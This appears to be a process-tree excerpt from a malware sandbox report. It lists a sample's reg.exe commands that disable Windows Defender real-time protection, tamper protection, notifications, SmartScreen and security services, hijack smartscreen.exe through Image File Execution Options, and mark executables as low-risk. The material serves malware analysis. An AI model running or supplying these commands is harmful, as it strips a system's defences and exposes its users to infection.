C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f8⤵PID:2436
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f /reg:648⤵PID:2864
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f8⤵PID:1796
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f /reg:648⤵PID:1500
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f8⤵PID:692
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f /reg:648⤵PID:1396
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f8⤵PID:1340
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d "00000001" /f /reg:648⤵PID:3048
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "00000001" /f /reg:648⤵
- Modifies Windows Defender notification settings
PID:3068
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_SZ /f /reg:648⤵
- Modifies Windows Defender notification settings
PID:1728
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "00000001" /f8⤵
- Modifies Windows Defender notification settings
PID:2328
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_SZ /f8⤵
- Modifies Windows Defender notification settings
PID:1672
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f /reg:648⤵
- Modifies Windows Defender notification settings
PID:1132
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f /reg:648⤵
- Modifies Windows Defender notification settings
PID:2156
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f8⤵
- Modifies Windows Defender notification settings
- System Location Discovery: System Language Discovery
PID:1044
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f8⤵
- Modifies Windows Defender notification settings
PID:892
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f /reg:648⤵PID:1000
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f8⤵PID:912
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f /reg:648⤵PID:1628
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f8⤵PID:264
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f /reg:648⤵PID:2528
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f8⤵PID:1980
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "NoActionNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:1624
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "FilesBlockedNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:648⤵PID:3024
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "SummaryNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:648⤵PID:2240
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRawWriteNotification /t REG_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:1748
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:2092
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d "1" /f8⤵
- Modifies Windows Defender Real-time Protection settings
PID:1860
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:1904
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f8⤵
- Modifies Windows Defender Real-time Protection settings
PID:1188
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:1940
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d "1" /f8⤵
- Modifies Windows Defender Real-time Protection settings
PID:1576
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:1740
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIntrusionPreventionSystem /t REG_DWORD /d "0" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:1884
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableInformationProtectionControl /t REG_DWORD /d "0" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:2496
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d "1" /f /reg:648⤵PID:2996
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t reg_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:1908
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t reg_DWORD /d "1" /f8⤵
- Modifies Windows Defender Real-time Protection settings
PID:2076
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d "0" /f /reg:648⤵PID:2088
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d "0" /f8⤵
- System Location Discovery: System Language Discovery
PID:2540
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d "2" /f /reg:648⤵PID:2104
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d "2" /f8⤵PID:2060
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d "0" /f /reg:648⤵PID:2396
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d "0" /f /reg:648⤵PID:1376
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d "1" /f /reg:648⤵PID:2056
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d "1" /f8⤵
- System Location Discovery: System Language Discovery
PID:1864
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d "8" /f /reg:648⤵PID:2504
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t reg_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender Real-time Protection settings
PID:1584
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t reg_DWORD /d "1" /f8⤵
- Modifies Windows Defender Real-time Protection settings
PID:2704
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f /reg:648⤵PID:2100
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f8⤵PID:2096
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f /reg:648⤵PID:2380
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f8⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f /reg:648⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f8⤵
- System Location Discovery: System Language Discovery
PID:2376
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f /reg:648⤵PID:2680
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f8⤵PID:2796
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "1" /f /reg:648⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:2860
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t "REG_DWORD" /d "0" /f /reg:648⤵PID:3004
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t "REG_DWORD" /d "0" /f8⤵
- Modifies Windows Defender TamperProtection settings
PID:2700
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v DisableAntiSpyware /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:2604
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "4" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:2748
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\MsSecFlt" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:2856
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:2752
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵PID:980
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵PID:332
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f8⤵
- System Location Discovery: System Language Discovery
PID:2888
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:2880
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2744
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:2780
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2760
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:2904
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:2988
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:2332
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:2608
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:2908
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:2732
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:2644
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies Security services
PID:2612
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- Modifies security service
PID:2476
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmAgent" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵PID:2464
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵PID:3000
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:2592
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefsvc" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵PID:2848
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefusersvc" /v "Start" /t REG_DWORD /d "4" /f /reg:648⤵PID:2616
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v DisableAntiSpyware /t REG_DWORD /d "4" /f8⤵
- Modifies security service
PID:2652
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "4" /f8⤵PID:2480
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2672
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\MsSecFlt" /v "Start" /t REG_DWORD /d "4" /f8⤵PID:2284
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:2452
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f8⤵PID:584
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:1848
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:2412
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:1692
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies Security services
PID:2660
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f8⤵
- Modifies security service
PID:2132
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmAgent" /v "Start" /t REG_DWORD /d "4" /f8⤵PID:1708
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f8⤵PID:2872
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f8⤵PID:1208
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefsvc" /v "Start" /t REG_DWORD /d "4" /f8⤵PID:1316
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefusersvc" /v "Start" /t REG_DWORD /d "4" /f8⤵PID:300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f 2>nul | find /i "webthreatdefusersvc"8⤵PID:2172
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f9⤵PID:2584
-
-
C:\Windows\SysWOW64\find.exefind /i "webthreatdefusersvc"9⤵PID:1720
-
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:2028
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v "Debugger" /t REG_SZ /d "%windir%\System32\taskkill.exe" /f /reg:648⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2164
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "6152" /f /reg:648⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f /reg:648⤵PID:1920
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;" /f /reg:648⤵
- System Location Discovery: System Language Discovery
PID:772
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "ModRiskFileTypes" /t REG_SZ /d ".bat;.exe;.reg;.vbs;.chm;.msi;.js;.cmd" /f /reg:648⤵PID:2044
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f /reg:648⤵PID:1452
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f8⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f /reg:648⤵PID:1972
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f8⤵PID:1568
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f /reg:648⤵PID:1252
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f /reg:648⤵PID:2144
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_DWORD /d "0" /f /reg:648⤵PID:2696
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f /reg:648⤵PID:2004
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f /reg:648⤵PID:1704
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f8⤵
- System Location Discovery: System Language Discovery
PID:1944
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v "Debugger" /t REG_SZ /d "%windir%\System32\taskkill.exe" /f8⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1056
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "6152" /f8⤵PID:1872
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f8⤵PID:1380
-
-
